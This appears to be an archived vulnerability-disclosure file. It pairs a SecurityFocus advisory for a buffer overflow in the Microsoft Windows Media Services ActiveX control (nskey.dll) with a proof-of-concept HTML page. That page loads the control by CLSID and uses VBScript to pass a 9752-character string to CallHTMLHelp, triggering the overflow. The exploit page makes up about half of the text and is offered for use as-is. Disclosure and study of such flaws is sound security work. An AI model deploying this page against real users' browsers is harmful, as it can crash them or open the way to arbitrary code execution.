18 lines
No EOL
724 B
HTML
18 lines
No EOL
724 B
HTML
source: https://www.securityfocus.com/bid/30814/info
|
|
|
|
The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
|
|
|
|
'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected.
|
|
|
|
<html><body>
|
|
|
|
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
|
|
<script language=vbscript>
|
|
|
|
arg1=String(9752, "A")
|
|
target.CallHTMLHelp arg1
|
|
|
|
</script>
|
|
</body></html> |